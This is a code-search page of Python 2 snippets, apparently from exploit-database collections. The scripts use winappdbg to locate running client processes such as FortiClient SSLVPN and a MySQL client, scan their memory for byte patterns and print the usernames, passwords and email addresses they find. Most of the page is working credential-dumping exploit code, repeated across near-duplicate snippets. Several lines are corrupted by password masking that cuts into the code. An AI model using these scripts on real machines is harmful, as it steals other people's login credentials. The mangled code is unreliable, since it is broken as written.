コード例 #1
0
def memory_search(pid, bytes):

    # Instance a Process object.
    process = Process(pid)

    # Search for the string in the process memory.
    for address in process.search_bytes(bytes):

        # Print the memory address where it was found.
        print HexDump.address(address)
コード例 #2
0
def memory_search( pid, bytes ):

    # Instance a Process object.
    process = Process( pid )

    # Search for the string in the process memory.
    for address in process.search_bytes( bytes ):

        # Print the memory address where it was found.
        print HexDump.address( address )
コード例 #3
0
ファイル: 40330.py プロジェクト: AlexxNica/exploit-database
def memory_search( pid, strings ):
                process = Process( pid )
                mem_dump = []
                                                                ######
                                                                # You could also use process.search_regexp to use regular expressions,
                                                                # or process.search_text for Unicode strings,
                                                                # or process.search_hexa for raw bytes represented in hex.
                                                                ######
                for address in process.search_bytes( strings ):
                                dump = process.read(address-10,800)                             #Dump 810 bytes from process memory
                                mem_dump.append(dump)
                                for i in mem_dump:
                                                if "FortiClient SSLVPN offline" in i:                       #print all founds results by offsets to the screen.
                                                                print "\n"
                                                                print " [+] Address and port to connect: " + str(i[136:180])
                                                                print " [+] UserName: "******" [+] Password: "******"\n"
コード例 #4
0
def memory_search(pid, strings):
    process = Process(pid)
    mem_dump = []
    ######
    # You could also use process.search_regexp to use regular expressions,
    # or process.search_text for Unicode strings,
    # or process.search_hexa for raw bytes represented in hex.
    ######
    for address in process.search_bytes(strings):
        dump = process.read(address - 10,
                            800)  #Dump 810 bytes from process memory
        mem_dump.append(dump)
        for i in mem_dump:
            if "FortiClient SSLVPN offline" in i:  #print all founds results by offsets to the screen.
                print "\n"
                print " [+] Address and port to connect: " + str(i[136:180])
                print " [+] UserName: "******" [+] Password: "******"\n"
コード例 #5
0
ファイル: 43033.py プロジェクト: xenoscr/exploit-database
debug = Debug()
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x0a\x70\x61\x73\x73\x77\x6f\x72\x64\x3d'):
            memory_dump.append(process.read(address, 42))
        for i in range(len(memory_dump)):
            password = memory_dump[i].split('password='******'':
                found = 1
                print "[+] Credentials found!\r\n----------------------------------------"
                print "[+] MD5 Password: %s" % password
        if found == 0:
            print "[-] Credentials not found! Make sure the client is connected."
    else:
        print "[-] No process found with name '%s'." % (filename)

    debug.loop()
finally:
    debug.stop()
コード例 #6
0
ファイル: 43033.py プロジェクト: AlexxNica/exploit-database
memory_dump = []
 
debug = Debug()
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process, process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)
         
        process = Process(process_pid)
        for address in process.search_bytes('\x0a\x70\x61\x73\x73\x77\x6f\x72\x64\x3d'):
            memory_dump.append(process.read(address,42))
        for i in range(len(memory_dump)):
            password = memory_dump[i].split('password='******'':
                found = 1
                print "[+] Credentials found!\r\n----------------------------------------"
                print "[+] MD5 Password: %s" % password
        if found == 0:
            print "[-] Credentials not found! Make sure the client is connected."
    else:
        print "[-] No process found with name '%s'." % (filename)
     
    debug.loop()
finally:
    debug.stop()
コード例 #7
0
passwd = []

debug = Debug()
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process, process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes("\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00"):
            memory_dump.append(process.read(address, 30))
        for i in range(len(memory_dump)):
            str = b2h(memory_dump[i])
            first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
            last = first.split(" 00 2D 70")
            if last[0]:
                usr = h2b(last[0])

        memory_dump = []
        for address in process.search_bytes(
            "\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        ):
            memory_dump.append(process.read(address, 100))
        sorted(set(memory_dump))
        for i in range(len(memory_dump)):
コード例 #8
0
def memory_search(pid, bytes):
    process = Process(pid)
    for address in process.search_bytes(
            bytes):  #process.search_text, process.search_hexa
        print HexDump.address(address)
コード例 #9
0
ファイル: 40350.py プロジェクト: CIAYSE/exploitsearch
    print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
    print "#\t\t\tPlease use responsibly.\t\t\t\t#"
    print "#########################################################################\r\n"
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
            memory_dump.append(process.read(address, 50))

        try:
            str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
            usr = h2b(str.split(' 00')[0])
        except:
            pass

        memory_dump = []
        for address in process.search_bytes(
                '\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
            memory_dump.append(process.read(address, 60))
        try:
            str = b2h(memory_dump[0]).split('07 00 02 09')[1]
            pwd = h2b(str.split(' 00')[0])
コード例 #10
0
ファイル: 40348.py プロジェクト: AlexxNica/exploit-database
memory_dump	= []

debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
			memory_dump.append(process.read(address,100))
		for i in range(len(memory_dump)):
			email_addr 	= memory_dump[i].split('email=')[1]
			tmp_passwd 	= memory_dump[i].split('password='******'\x00')[0]
			password	= tmp_passwd.split('&is_sso_link=')[0]
			if username != '' and password !='':
				found = 1
				print "[+] Credentials found!\r\n----------------------------------------"
				print "[+] Username: %s" % urllib.unquote_plus(username)
				print "[+] Password: %s" % password
		if found == 0:
			print "[-] Credentials not found! Make sure the client is connected."
	else:
		print "[-] No process found with name '%s'." % (filename)
コード例 #11
0
	return ''.join(bytes)

debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
			memory_dump.append(process.read(address,30))
		memory_dump.pop(0)
		for i in range(len(memory_dump)):
			str = b2h(memory_dump[i])
			first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
			last = first.split("00 ")
			if last[0]:
				count = count+1
				found = 1
				print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
		if found == 0:
			print "[-] Password not found! Make sure the client is connected at least to one database."
	else:
		print "[-] No process found with name '%s'." % (filename)
	
コード例 #12
0
ファイル: mysql-cred.py プロジェクト: eaneatfruit/ExploitDev
debug = Debug()
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
            memory_dump.append(process.read(address, 30))
        for i in range(len(memory_dump)):
            str = b2h(memory_dump[i])
            first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
            last = first.split(" 00 2D 70")
            if last[0]:
                usr = h2b(last[0])

        memory_dump = []
        for address in process.search_bytes(
                '\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        ):
            memory_dump.append(process.read(address, 100))
        sorted(set(memory_dump))
        for i in range(len(memory_dump)):
コード例 #13
0
ファイル: 40350.py プロジェクト: AlexxNica/exploit-database
	print "#   Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
	print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
	print "#########################################################################\r\n"
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
			memory_dump.append(process.read(address,50))
		
		try:
			str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
			usr = h2b(str.split(' 00')[0])
		except:
			pass
			
		memory_dump	= []
		for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
			memory_dump.append(process.read(address,60))
		try:
			str = b2h(memory_dump[0]).split('07 00 02 09')[1]
			pwd = h2b(str.split(' 00')[0])
		except:
	return ''.join(bytes)

debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
			memory_dump.append(process.read(address,30))
		memory_dump.pop(0)
		for i in range(len(memory_dump)):
			str = b2h(memory_dump[i])
			first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
			last = first.split("00 ")
			if last[0]:
				count = count+1
				found = 1
				print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
		if found == 0:
			print "[-] Password not found! Make sure the client is connected at least to one database."
	else:
		print "[-] No process found with name '%s'." % (filename)
	
memory_dump	= []

debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
			memory_dump.append(process.read(address,150))
		for i in range(len(memory_dump[0])):
			email_addr 	= memory_dump[i].split('email=')[1]
			tmp_passwd 	= memory_dump[i].split('password='******'&hiddenEmail=')[0]
			password	= tmp_passwd.split('&rememberMe=')[0]
			if username != '' and password !='':
				found = 1
				print "[+] Credentials found!\r\n----------------------------------------"
				print "[+] Username: %s" % urllib.unquote_plus(username)
				print "[+] Password: %s" % password
				break
		if found == 0:
			print "[-] Credentials not found! Make sure the client is connected."
	else:
コード例 #16
0
debug = Debug()
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
            memory_dump.append(process.read(address, 150))
        for i in range(len(memory_dump[0])):
            email_addr = memory_dump[i].split('email=')[1]
            tmp_passwd = memory_dump[i].split('password='******'&hiddenEmail=')[0]
            password = tmp_passwd.split('&rememberMe=')[0]
            if username != '' and password != '':
                found = 1
                print "[+] Credentials found!\r\n----------------------------------------"
                print "[+] Username: %s" % urllib.unquote_plus(username)
                print "[+] Password: %s" % password
                break
        if found == 0:
            print "[-] Credentials not found! Make sure the client is connected."
    else:
コード例 #17
0
debug = Debug()
try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process,
         process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid is not 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)

        process = Process(process_pid)
        for address in process.search_bytes(
                '\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
            memory_dump.append(process.read(address, 100))
        for i in range(len(memory_dump)):
            email_addr = memory_dump[i].split('email=')[1]
            tmp_passwd = memory_dump[i].split('password='******'\x00')[0]
            password = tmp_passwd.split('&is_sso_link=')[0]
            if username != '' and password != '':
                found = 1
                print "[+] Credentials found!\r\n----------------------------------------"
                print "[+] Username: %s" % urllib.unquote_plus(username)
                print "[+] Password: %s" % password
        if found == 0:
            print "[-] Credentials not found! Make sure the client is connected."
    else:
        print "[-] No process found with name '%s'." % (filename)